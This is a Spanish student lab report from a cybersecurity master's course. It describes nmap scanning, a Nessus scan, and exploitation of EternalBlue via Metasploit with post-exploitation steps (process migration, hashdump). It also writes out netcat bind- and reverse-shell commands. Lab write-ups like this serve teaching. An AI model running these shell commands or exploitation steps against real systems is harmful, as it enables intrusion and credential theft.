0% encontró este documento útil (0 votos)
126 vistas14 páginas

Gomez Rodriguez Jose Mario Actividad2

Cargado por

mariogomez1016
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como DOCX, PDF, TXT o lee en línea desde Scribd
0% encontró este documento útil (0 votos)
126 vistas14 páginas

Gomez Rodriguez Jose Mario Actividad2

Cargado por

mariogomez1016
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como DOCX, PDF, TXT o lee en línea desde Scribd
Está en la página 1/ 14

Asignatura Datos del estudiante Fecha

Hacking Ético y Análisis Apellidos: Gomez Rodriguez


27-05-2024
de Malware Nombre: Jose Mario

Explotación y posexplotación con Metasploit


Hacking Ético y análisis de malware

Jose Mario Gomez Rodriguez

© Universidad Internacional de La Rioja (UNIR)

Universidad Internacional de La Rioja (UNIR)


Máster Universitario en Ciberseguridad
27 de mayo del 2024

1
Actividades
Asignatura Datos del estudiante Fecha
Hacking Ético y Análisis Apellidos: Gomez Rodriguez
27-05-2024
de Malware Nombre: Jose Mario

Tabla de contenido
1. Fingerprinting y recopilación de todos los puertos y versiones
posibles.....................................................................................................................4

2. Explicar la diferencia entre un payload de tipo bind y reverse, y


ejemplificarla..........................................................................................................6

3. Explotar vulnerabilidad y obtener control.............................................7

4. obtener el control remoto de la máquina a través de un


meterpreter...........................................................................................................10

5. Posexplotación.............................................................................................12

6. Conclusiones.................................................................................................13

Ilustración 1Uso de virtual box....................................................................................4


Ilustración 2Configuración de red...............................................................................4
Ilustración 3Identificación de host con NMAP............................................................5
Ilustración 4Maquina Objetivo....................................................................................5
Ilustración 5Puertos y servicios...................................................................................6
Ilustración 6Instalación de NESSUS.............................................................................8
Ilustración 7Ejecución de análisis................................................................................8
Ilustración 8Informe de vulnerabilidades....................................................................9
Ilustración 9Vulnerabilidades criticas..........................................................................9
Ilustración 10 Vulnerabilidades medias......................................................................9
Ilustración 11 Valdación de exploit con Meterpreter................................................10
© Universidad Internacional de La Rioja (UNIR)
Ilustración 12 Configuración de exploit.....................................................................10
Ilustración 13Opciones de payload...........................................................................10
Ilustración 14Configurar host objetivo......................................................................11
Ilustración 15Ejecución del exploit............................................................................11
Ilustración 16Elevación de privilegios.......................................................................12

2
Actividades
Asignatura Datos del estudiante Fecha
Hacking Ético y Análisis Apellidos: Gomez Rodriguez
27-05-2024
de Malware Nombre: Jose Mario

Ilustración 17 Procesos activos.................................................................................12


Ilustración 18Proceso seleccionado..........................................................................12
Ilustración 19Migración del proceso.........................................................................13
Ilustración 20Hash de usuarios.................................................................................13

© Universidad Internacional de La Rioja (UNIR)

3
Actividades
Asignatura Datos del estudiante Fecha
Hacking Ético y Análisis Apellidos: Gomez Rodriguez
27-05-2024
de Malware Nombre: Jose Mario

1. Fingerprinting y recopilación de todos los puertos y versiones posibles.


Se realiza la instalación de las máquinas virtuales utilizando virtualbox y la
respectiva configuración de red para las maquinas utilizadas.

Ilustración 1Uso de virtual box

(UNIR )

© Universidad Internacional de La Rioja (UNIR)


Ilustración 2Configuración de red

Se utiliza el comando NMAP para el mapeo y posterior identificación de los host


en la red utilizando el comando nmap –sn 192.168.20.0/24.

4
Actividades
Asignatura Datos del estudiante Fecha
Hacking Ético y Análisis Apellidos: Gomez Rodriguez
27-05-2024
de Malware Nombre: Jose Mario

Ilustración 3Identificación de host con NMAP

Con la identificación de los host se logra identificar la maquina objetivo del


análisis.

Ilustración 4Maquina Objetivo


© Universidad Internacional de La Rioja (UNIR)
Se debe identificar los puertos y servicios que se ejecutan en la maquina objetivo,
para lo cual se utiliza el comando nmap –sS.

5
Actividades
Asignatura Datos del estudiante Fecha
Hacking Ético y Análisis Apellidos: Gomez Rodriguez
27-05-2024
de Malware Nombre: Jose Mario

Ilustración 5Puertos y servicios

2. Explicar la diferencia entre un payload de tipo bind y reverse, y


ejemplificarla.
En el Bind de Shell el sistema objetivo escucha en un puerto especifico
esperando una conexión entrante desde el atacante. Es como si el sistema
comprometido abriera una puerta para esperar que alguien se conecte a él.
 Funcionamiento
1. El sistema objetivo ejecuta un programa que abre un puerto y
queda en modo escucha.
2. El atacante se conecta a ese puerto desde su máquina.
3. Una vez establecida la conexión, el ataque puede ejecutar
llamados de comando y control.
 Ejemplo
Atacante: Dirección IP “192.168.1.100”
Objetivo: Dirección “192.168.1.200”
© Universidad Internacional de La Rioja (UNIR)
El atacante utiliza Netcat en el sistema operativo objetivo con el comando
“nc -lvp 4444 -e /bin/bash” el cual deja en modo el escucha el puerto
4444 par aque alguien se conecte.
El atacante se conecta al puerto 4444 con el comando nc 192.168.1.200
4444.

6
Actividades
Asignatura Datos del estudiante Fecha
Hacking Ético y Análisis Apellidos: Gomez Rodriguez
27-05-2024
de Malware Nombre: Jose Mario

En Reverse Shell el sistema objetivo se conecta de vuelta a la maquina


controlada por el atacante. El sistema comprometido abre una puerta y luego
sale para conectarse al atacante.
 Funcionamiento
1. El atacante configura su máquina para esperar peticiones.
2. El sistema objetivo se conecta al atacante.
3. Una vez establecida la conexión el atacante puede enviar llamados
de comando y control.
 Ejemplo
Atacante: Dirección 192.168.1.100
Objetivo: Dirección 192.168.1.200
El atacante utiliza Netcat para escuchar peticiones.
En la máquina del atacante se utiliza el comando “nc -lvp 4444” para
dejar el puerto 4444 en modo escucha.
En la maquina objetivo se ejecuta el comando “nc 192.168.1.100 4444 -
e /bin/bash” para conectar con el atacante y ejecutar el comando -e
/bin/bash.
 Diferencias
La principal diferencia es que en Bind Shell el objetivo escucha y el
atacante se conecta mientras que en Reverse Shell el objetivo se conecta
al atacante.

3. Explotar vulnerabilidad y obtener control

Se realiza la instalación de Nessus para realizar un análisis de vulnerabildiades


sobre la maquina objetivo.

© Universidad Internacional de La Rioja (UNIR)

7
Actividades
Asignatura Datos del estudiante Fecha
Hacking Ético y Análisis Apellidos: Gomez Rodriguez
27-05-2024
de Malware Nombre: Jose Mario

Ilustración 6Instalación de NESSUS

Ilustración 7Ejecución de análisis

La ejecución del escaneo nos da como resultado un total de 44 vulnerabilidades


de las cuales se identifican vulnerabilidades críticas de apache y de conexión
remota.
© Universidad Internacional de La Rioja (UNIR)

8
Actividades
Asignatura Datos del estudiante Fecha
Hacking Ético y Análisis Apellidos: Gomez Rodriguez
27-05-2024
de Malware Nombre: Jose Mario

Ilustración 8Informe de vulnerabilidades

Ilustración 9Vulnerabilidades criticas

© Universidad Internacional de La Rioja (UNIR)

Ilustración 10 Vulnerabilidades medias

9
Actividades
Asignatura Datos del estudiante Fecha
Hacking Ético y Análisis Apellidos: Gomez Rodriguez
27-05-2024
de Malware Nombre: Jose Mario

4. obtener el control remoto de la máquina a través de un meterpreter


Se ejecuta meterpreter en Kali para poder realizar la respectiva explotación, una
vez ejecutado se realiza búsqueda de search eternla y se utiliza el exploit ms17-
eternalblue para SMB.

Ilustración 11 Valdación de exploit con Meterpreter

Dentro del exploit se utiliza la opción (0) y la ruta del objetivo.

Ilustración 12 Configuración de exploit

Con el comando show options se ven las opciones del payload, como se puede
evidenciar todas están configuradas con LPORT por defecto en el puerto 4444
solo se debe configurar el RHOST.

© Universidad Internacional de La Rioja (UNIR)

Ilustración 13Opciones de payload

10
Actividades
Asignatura Datos del estudiante Fecha
Hacking Ético y Análisis Apellidos: Gomez Rodriguez
27-05-2024
de Malware Nombre: Jose Mario

Se procede a configurar el host con el comando set host para asignar la dirección
del maquina objetivo.

Ilustración 14Configurar host objetivo

Se procede a utilizar el comando run para ejecutar el exploit y ganar acceso a la


maquina objetivo.

© Universidad Internacional de La Rioja (UNIR)


Ilustración 15Ejecución del exploit

11
Actividades
Asignatura Datos del estudiante Fecha
Hacking Ético y Análisis Apellidos: Gomez Rodriguez
27-05-2024
de Malware Nombre: Jose Mario

5. Posexplotación
Se inicia sesión dentro la maquina objetivo elevando privilegios con meterpreter.

Ilustración 16Elevación de privilegios

Se procede a listar los procesos activos con el comando ps.

Ilustración 17 Procesos activos

Se toma el proceso spoolsv para migrar.

Ilustración 18Proceso seleccionado

Se utiliza el comando migrate para realizar la migración de proceso

© Universidad Internacional de La Rioja (UNIR)

12
Actividades
Asignatura Datos del estudiante Fecha
Hacking Ético y Análisis Apellidos: Gomez Rodriguez
27-05-2024
de Malware Nombre: Jose Mario

Ilustración 19Migración del proceso

Se utiliza el comando hashdump para visualizar los hash de los usuarios del
sistema.

Ilustración 20Hash de usuarios

6. Conclusiones
Con la ejecución de la actividad logramos identificar las fases del hacking como
lo es el reconcomiendo, enumeración, explotación y posexplotación aplicando el
© Universidad Internacional de La Rioja (UNIR)
ciclo del hacking, la cual nos permite interactuar en un ambiente controlado y de
esta forma ejecutar las diferentes aplicaciones que tiene Kali para atacar
maquinas objetivos.

El uso de bash nos permite identificar y atacar maquinas en la red así se tengan
reglas de firewall que bloquean el acceso a los recursos, pero por lo general no

13
Actividades
Asignatura Datos del estudiante Fecha
Hacking Ético y Análisis Apellidos: Gomez Rodriguez
27-05-2024
de Malware Nombre: Jose Mario

crean reglas de salida lo cual permite tener un oyente que permita las conexiones
en escucha ayudando a saltar las políticas de seguridad, con lo cual luego
podemos ejecutar una subida de privilegios con la ejecución de meterpreter y así
combinar distintos ataques para logar nuestro objetivo de comprometer un
activo de información.

La falta de actualizaciones por parte de los equipos de tecnología es una brecha


que nos permite la identificación de vulnerabilidades en los sistemas de las
compañías, al poder utilizar herramientas como Nessus que nos permite
identificar los host o las redes necesarios y sus respectivas vulnerabilidades
como parte del reconocimiento, como atacantes podemos usar esta información
para atacar los activos que se dejan en el olvido y nos facilita una intrusión y
posibles movimientos laterales.

© Universidad Internacional de La Rioja (UNIR)

14
Actividades

También podría gustarte